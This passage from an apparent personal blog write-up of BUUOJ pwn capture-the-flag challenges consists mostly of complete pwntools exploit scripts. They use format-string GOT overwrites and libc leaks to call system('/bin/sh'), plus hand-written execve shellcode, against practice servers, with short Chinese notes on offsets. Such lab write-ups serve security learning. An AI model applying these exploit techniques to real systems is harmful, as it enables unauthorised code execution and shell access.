class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment">#!/usr/bin/python3</span><br><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> LibcSearcher3 <span class="hljs-keyword">import</span> LibcSearcher<br>context(log_level=<span class="hljs-string">&#x27;debug&#x27;</span>)<br>e=ELF(<span class="hljs-string">&#x27;./axb_2019_fmt32&#x27;</span>)<br>p=process(<span class="hljs-string">&#x27;./axb_2019_fmt32&#x27;</span>)<br>p=remote(<span class="hljs-string">&#x27;node4.buuoj.cn&#x27;</span>,<span class="hljs-number">27454</span>)<br><span class="hljs-comment">#gdb.attach(p, &#x27;b *0x0804867D&#x27;)</span><br><br>lsm_a = e.got[<span class="hljs-string">&#x27;__libc_start_main&#x27;</span>]<br>memset_g = e.got[<span class="hljs-string">&#x27;memset&#x27;</span>]<br><br>p.recvuntil(<span class="hljs-string">&#x27;Please tell me:&#x27;</span>)<br>payload = <span class="hljs-string">b&#x27;%2$p&#x27;</span><br>p.send(payload)<br>p.recvuntil(<span class="hljs-string">&#x27;Repeater:&#x27;</span>)<br>ret = <span class="hljs-built_in">int</span>(p.recvuntil(<span class="hljs-string">&#x27;\n&#x27;</span>)[:-<span class="hljs-number">1</span>],<span class="hljs-number">16</span>)<br>ret += <span class="hljs-number">0x23d</span><br><span class="hljs-built_in">print</span>(<span class="hljs-string">&#x27;the address of ret %#x&#x27;</span>%ret)<br><br>p.recvuntil(<span class="hljs-string">&#x27;Please tell me:&#x27;</span>)<br>payload = <span class="hljs-string">b&#x27;aaa&#x27;</span> + p32(lsm_a) + <span class="hljs-string">b&#x27;%75$s&#x27;</span> <br><span class="hljs-comment">#payload = b&#x27;aaaa&#x27;+b&#x27;%75$p&#x27;</span><br>p.send(payload)<br><br>lsm_a = u32(p.recvuntil(<span class="hljs-string">&#x27;\xf7&#x27;</span>)[-<span class="hljs-number">4</span>:])<br><span class="hljs-built_in">print</span>(<span class="hljs-string">&#x27;the true address of __libc_start_main is %#x&#x27;</span>%lsm_a)<br><br><br>libc = LibcSearcher(<span class="hljs-string">&#x27;__libc_start_main&#x27;</span>, lsm_a)<br>libcbase = lsm_a - libc.dump(<span class="hljs-string">&#x27;__libc_start_main&#x27;</span>)<br>sys_a = libcbase + libc.dump(<span class="hljs-string">&#x27;system&#x27;</span>)<br>bs_a = libcbase + libc.dump(<span class="hljs-string">&#x27;str_bin_sh&#x27;</span>)<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">change</span>(<span class="hljs-params">addr, content</span>):<br>    <br>    payload = <span class="hljs-string">b&#x27;baa&#x27;</span> + p32(addr) + <span class="hljs-string">b&#x27;%&#x27;</span>+<span class="hljs-built_in">str</span>(content-<span class="hljs-number">4</span>-<span class="hljs-number">12</span>).encode() + <span class="hljs-string">b&#x27;d%75$hn&#x27;</span> <br>    <span class="hljs-comment">#assert len(payload) &lt;=6</span><br>    <br><br><span class="hljs-built_in">print</span>(<span class="hljs-string">&#x27;the address of sys %#x&#x27;</span>%sys_a)<br><br>p.recvuntil(<span class="hljs-string">&#x27;Please tell me:&#x27;</span>)<br>payload = <span class="hljs-string">b&#x27;baa&#x27;</span>+fmtstr_payload(<span class="hljs-number">75</span>,&#123;memset_g:sys_a&#125;, <span class="hljs-number">12</span>,<span class="hljs-string">&#x27;byte&#x27;</span>)<br><span class="hljs-comment">#payload = b&#x27;aaa&#x27;+fmtstr_payload(75,&#123;ret:sys_a&#125;, 12,&#x27;byte&#x27;)</span><br>p.send(payload)<br><br>p.recvuntil(<span class="hljs-string">&#x27;Repeater:&#x27;</span>)<br>p.send(<span class="hljs-string">b&#x27;;/bin/sh\0&#x27;</span>)<br>p.interactive()<br></code></pre></td></tr></table></figure>





<h2 id="pwnable-start"><a href="#pwnable-start" class="headerlink" title="pwnable_start"></a>pwnable_start</h2><p>ret2shellcode ret2syscall汇编</p>
<p>没有栈不可执行保护，所以选择ret2shellcode，其次该程序很简洁，函数调用均使用系统调用。</p>
<p>先泄露栈上地址。第一次返回后esp刚好指向一个栈地址。其次write系统调用的buf地址直接取当时的esp。因此将返回地址修改到write前面，即可实现泄露地址。泄露的地址与ret后可输入的buf地址（即ret后esp地址）偏差为cfdc-cfe0&#x3D;4。（返回到mov ecx, esp处。因为write和read系统调用均已ecx为输入输出处，所以可控制栈内存起始处就是esp处。</p>
<p><img onerror="imgOnError(this);" data-fancybox="gallery" src="/./buu_0910/image-20230917173934650.png" alt="image-20230917173934650" data-caption="image-20230917173934650" loading="lazy"></p>
<p>由于只能输入3c个字符，0x14处为返回地址，而之后仅剩3c-14&#x3D;0x28个字节可输入，而shellcode有2c个字节，不够写。所以自己写一个shellcode。</p>
<p>在第一次输入时顺便写入&#x2F;bin&#x2F;sh字符，第二次构造shellocde时直接把第一次输入的地址传入ebx寄存器。地址与第二次ret后esp的偏差为(0x14+0x4)*2&#x3D;0x30。之后把eax, ecx, edx的值分别设置即可。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs assembly">sub esp, 0x030; <br>mov ebx, esp; <br>xor ecx, ecx; <br>xor edx, edx; <br>push 0xb; <br>pop eax; <br>int 0x80;<br></code></pre></td></tr></table></figure>

<p>长度为0xE</p>
<p>完整代码：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment">#!/usr/bin/python3</span><br><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>context(os=<span class="hljs-string">&#x27;linux&#x27;</span>, arch=<span class="hljs-string">&#x27;i386&#x27;</span>, log_level=<span class="hljs-string">&#x27;debug&#x27;</span>)<br><span class="hljs-comment">#p=process(&#x27;./start&#x27;)</span><br>p=remote(<span class="hljs-string">&#x27;node4.buuoj.cn&#x27;</span>,<span class="hljs-number">25028</span>)<br><span class="hljs-comment">#gdb.attach(p, &#x27;b 0x08048087&#x27;)</span><br><br>offset = <span class="hljs-number">0x014</span><br>tar1 = <span class="hljs-number">0x08048087</span><br>payload = <span class="hljs-string">b&#x27;/bin/sh\0&#x27;</span>.ljust(offset,<span class="hljs-string">b&#x27;a&#x27;</span>) + p32(tar1)<br>p.send(payload)<br><br>p.recvuntil(<span class="hljs-string">&#x27;CTF:&#x27;</span>)<br>addr1 = u32(p.recv(<span class="hljs-number">4</span>))<br>addr2 = addr1-<span class="hljs-number">4</span><br><br>assem=<span class="hljs-string">&#x27;sub esp, 0x030; mov ebx, esp; xor ecx, ecx; xor edx, edx; push 0xb; pop eax; int 0x80;&#x27;</span><br><br>payload = asm(assem).ljust(offset,<span class="hljs-string">b&#x27;a&#x27;</span>) + p32(addr2)<br>p.send(payload)<br>p.interactive()<br></code></pre></td></tr></table></figure>



<h2 id="-2"><a href="#-2" class="headerlink" title=""></a></h2><h2 id="axb-2019-fmt64"><a href="#axb-2019-fmt64" class="headerlink" title="axb_2019_fmt64"></a>axb_2019_fmt64</h2><p>64位为寄存器传参，第7位参数开始才放在栈上。</p>
<p><img onerror="imgOnError(this);" data-fancybox="gallery" src="/./buu_0910/image-20230919172840631.png" alt="image-20230919172840631" data-caption="image-20230919172840631" loading="lazy"></p>
<p>可控制的字符串位置为db50（前一个有个冒号）栈上参数起始位置为db40</p>
<p>所以参数偏移为 6+(0xdb50 - 0xdb40)&#x2F;0x8 &#x3D; 0x8&#x3D;8</p>
<p>已填充字符个数为9</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment">#!/usr/bin/python3</span><br><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> LibcSearcher3 <span class="hljs-keyword">import</span> LibcSearcher<br>context(arch=<span class="hljs-string">&#x27;amd64&#x27;</span>,log_level=<span class="hljs-string">&#x27;debug&#x27;</span>)<br>e=ELF(<span class="hljs-string">&#x27;./axb_2019_fmt64&#x27;</span>)<br><span class="hljs-comment">#=process(&#x27;./axb_2019_fmt64&#x27;)</span><br>p=remote(<span class="hljs-string">&#x27;node4.buuoj.cn&#x27;</span>,<span class="hljs-number">29294</span>)<br><span class="hljs-comment">#db.attach(p, &#x27;b printf&#x27;)</span><br><br>lsm_g = e.got[<span class="hljs-string">&#x27;__libc_start_main&#x27;</span>]<br>printf_g = e.got[<span class="hljs-string">&#x27;printf&#x27;</span>]<br><br>p.recvuntil(<span class="hljs-string">&#x27;Please tell me:&#x27;</span>)<br>payload = <span class="hljs-string">b&#x27;%9$s&#x27;</span>.ljust(<span class="hljs-number">8</span>,<span class="hljs-string">b&#x27;a&#x27;</span>) + p64(lsm_g)<br>p.send(payload)<br><br>p.recvuntil(<span class="hljs-string">&#x27;Repeater:&#x27;</span>)<br>lsm_a = u64(p.recvuntil(<span class="hljs-string">b&#x27;\x7f&#x27;</span>).ljust(<span class="hljs-number">8</span>,<span class="hljs-string">b&#x27;\0&#x27;</span>))<br><span class="hljs-built_in">print</span>(<span class="hljs-string">&#x27;the true address of __libc_start_main is %#x&#x27;</span>%lsm_a)<br><br><br>libc = LibcSearcher(<span class="hljs-string">&#x27;__libc_start_main&#x27;</span>, lsm_a)<br>libcbase = lsm_a - libc.dump(<span class="hljs-string">&#x27;__libc_start_main&#x27;</span>)<br>sys_a = libcbase + libc.dump(<span class="hljs-string">&#x27;system&#x27;</span>)<br>bs_a = libcbase + libc.dump(<span class="hljs-string">&#x27;str_bin_sh&#x27;</span>)<br><br><br><span class="hljs-built_in">print</span>(<span class="hljs-string">&#x27;the address of sys %#x&#x27;</span>%sys_a)<br><br>p.recvuntil(<span class="hljs-string">&#x27;Please tell me:&#x27;</span>)<br>payload = fmtstr_payload(<span class="hljs-number">8</span>,&#123;printf_g:sys_a&#125;, <span class="hljs-number">9</span>,<span class="hljs-string">&#x27;byte&#x27;</span>)<br>p.send(payload)<br><br>p.recvuntil(<span class="hljs-string">&#x27;Repeater:&#x27;</span>)<br>p.send(<span class="hljs-string">b&#x27;;/bin/sh\0&#x27;</span>)<br>p.interactive()<br></code></pre></td></tr></table></figure>

<p>有一点是该程序里有个sprintf进行字符串转移，所以转移时会被’\0’截断，并且切断后还会加个回车字符。所以地址只能取s变量处的而不能取format处的。之前32位程序代码几乎一样，但是我读取的是format处的字符串，所以迁移程序的时候卡了好久。</p>
<p>这个程序迁移回32位就简单多了。</p>
<h2 id="hitcontraining-magicheap"><a href="#hitcontraining-magicheap" class="headerlink" title="hitcontraining_magicheap"></a>hitcontraining_magicheap</h2>
    </div>
</article>


                </div>
                <aside class="col-md-4 gal-left" id="sidebar">
    <!-- 此为sidebar的搜索框, 非搜索结果页面 -->
<aside id="sidebar-search">
    <div class="search hidden-xs" data-aos="fade-up" data-aos-duration="2000">
        <form class="form-inline clearfix" id="search-form" method="get"
              action="/search/index.html">
            <input type="text" name="s" class="form-control" id="searchInput" placeholder="搜索文章~" autocomplete="off">
            <button class="btn btn-danger btn-gal" type="submit">
                <i class="fa fa-search"></i>
            </button>
        </form>
    </div>
</aside>
    <aside id="sidebar-author">
    <div class="panel panel-gal" data-aos="flip-right" data-aos-duration="3000">
        <div class="panel-heading" style="text-align: center">
            <i class="fa fa-quote-left"></i>
            Walt CSZ
            <i class="fa fa-quote-right"></i>
        </div>
        <div class="author-panel text-center">
            <img src="/imgs/avatar.jpg" width="140" height="140"
                 alt="个人头像" class="author-image">
            <p class="author-description"></p>
        </div>
    </div>
</aside>
    
    <aside id="sidebar-recent_comments">
    <div class="panel panel-gal recent hidden-xs" data-aos="fade-up" data-aos-duration="2000">
        <div class="panel-heading">
            <i class="fa fa-comments"></i>
            最新评论
            <i class="fa fa-times-circle panel-remove"></i>
            <i class="fa fa-chevron-circle-up panel-toggle"></i>
        </div>
        <ul class="list-group list-group-flush"></ul>
    </div>
</aside>
    
    <!-- 要配置好leancloud才能开启此小工具 -->
    
    
    <aside id="sidebar-recent_posts">
    <div class="panel panel-gal recent hidden-xs" data-aos="fade-up" data-aos-duration="2000">
        <div class="panel-heading">
            <i class="fa fa-refresh"></i>
            近期文章
            <i class="fa fa-times-circle panel-remove"></i>
            <i class="fa fa-chevron-circle-up panel-toggle"></i>
        </div>
        <ul class="list-group list-group-flush">
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2023/10/26/writeUp/0xgame/">0xgame</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2023/10/23/writeUp/newstarctf2023_week5/"></a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2023/10/20/writeUp/newstarctf/">newstarctf</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2023/10/19/hello-world/">Hello World</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2023/10/19/writeUp/newstarctf2023_week4/">newstartctf2023_week4</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2023/09/11/writeUp/buu_0910/"></a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2023/09/07/writeUp/%E5%BC%82%E6%9E%B6%E6%9E%84/"></a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2023/09/03/writeUp/wmctf23/"></a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2023/08/31/writeUp/buu_0830/"></a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2023/08/26/writeUp/buu_0824/"></a>
                </span>
            </li>
            
        </ul>
    </div>
</aside>
    
    
    <aside id="sidebar-rand_posts">
    <div class="panel panel-gal recent hidden-xs" data-aos="fade-up" data-aos-duration="2000">
        <div class="panel-heading">
            <i class="fa fa-refresh"></i>
            随机文章
            <i class="fa fa-times-circle panel-remove"></i>
            <i class="fa fa-chevron-circle-up panel-toggle"></i>
        </div>
        <ul class="list-group list-group-flush">
            
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2023/10/19/hello-world/">Hello World</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2023/08/26/writeUp/buu_0824/"></a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2023/08/31/writeUp/buu_0830/"></a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2023/09/11/writeUp/buu_0910/"></a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2023/08/12/writeUp/moectf/"></a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2023/10/23/writeUp/newstarctf2023_week5/"></a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2023/08/12/writeUp/%E5%A0%86/"></a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2023/08/20/writeUp/%E6%B1%87%E7%BC%96/"></a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2023/07/19/writeUp/%E7%8E%AF%E5%A2%83/"></a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2023/10/20/writeUp/newstarctf/">newstarctf</a>
                </span>
            </li>
            
        </ul>
    </div>
</aside>
    
    
    <aside id="gal-sets">
        <div class="panel panel-gal hidden-xs" data-aos="fade-up" data-aos-duration="2000">
            <ul class="nav nav-pills pills-gal">

                
                <li>
                    <a href="/2023/09/11/writeUp/buu_0910/index.html#sidebar-tags" data-toggle="tab" id="tags-tab">热门标签</a>
                </li>
                
                
                <li>
                    <a href="/2023/09/11/writeUp/buu_0910/index.html#sidebar-friend-links" data-toggle="tab" id="friend-links-tab">友情链接</a>
                </li>
                
                
                <li>
                    <a href="/2023/09/11/writeUp/buu_0910/index.html#sidebar-links" data-toggle="tab" id="links-tab">个人链接</a>
                </li>
                
            </ul>
            <div class="tab-content">
                
                <div class="cloud-tags tab-pane nav bs-sidenav fade" id="sidebar-tags">
    
</div>
                
                
                <div class="friend-links tab-pane nav bs-sidenav fade" id="sidebar-friend-links">
    
    <li>
        <a href="http://kdays.net/days/" target="_blank">KDays Forum</a>
    </li>
    
    <li>
        <a href="http://www.gal123.com/" target="_blank">绅士导航♂</a>
    </li>
    
    <li>
        <a href="http://www.moe123.com/" target="_blank">萌导航</a>
    </li>
    
</div>
                
                
                <div class="links tab-pane nav bs-sidenav fade" id="sidebar-links">
    
    <li>
        <a href="https://github.com/ZEROKISEKI/" target="_blank">Github</a>
    </li>
    
    <li>
        <a href="https://coding.net/u/SORA1" target="_blank">Coding</a>
    </li>
    
    <li>
        <a href="https://www.zhihu.com/people/aonosora/activities" target="_blank">知乎</a>
    </li>
    
</div>
                
            </div>
        </div>
    </aside>
    
</aside>
            </div>
        </div>
    </div>
    <footer id="gal-footer">
    <div class="container">
        Copyright © 2018 Walt CSZ Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>.&nbsp;Theme by <a href="https://github.com/ZEROKISEKI" target="_blank">AONOSORA</a>
    </div>
</footer>

<!-- 回到顶端 -->
<div id="gal-gotop">
    <i class="fa fa-angle-up"></i>
</div>
</body>

<script src="/js/activate-power-mode.js"></script>

<script>

    // 配置highslide
	hs.graphicsDir = '/js/highslide/graphics/'
    hs.outlineType = "rounded-white";
    hs.dimmingOpacity = 0.8;
    hs.outlineWhileAnimating = true;
    hs.showCredits = false;
    hs.captionEval = "this.thumb.alt";
    hs.numberPosition = "caption";
    hs.align = "center";
    hs.transitions = ["expand", "crossfade"];
    hs.lang.number = '共%2张图, 当前是第%1张';
    hs.addSlideshow({
      interval: 5000,
      repeat: true,
      useControls: true,
      fixedControls: "fit",
      overlayOptions: {
        opacity: 0.75,
        position: "bottom center",
        hideOnMouseOut: true
      }
    })

    // 初始化aos
    AOS.init({
      duration: 1000,
      delay: 0,
      easing: 'ease-out-back'
    });

</script>
<script>
	POWERMODE.colorful = 'true';    // make power mode colorful
	POWERMODE.shake = 'true';       // turn off shake
	// TODO 这里根据具体情况修改
	document.body.addEventListener('input', POWERMODE);
</script>
<script>
    window.slideConfig = {
      prefix: '/imgs/slide/background',
      ext: 'jpg',
      maxCount: '6'
    }
</script>

<script src="/js/hs.js"></script>
<script src="/js/blog.js"></script>




</html>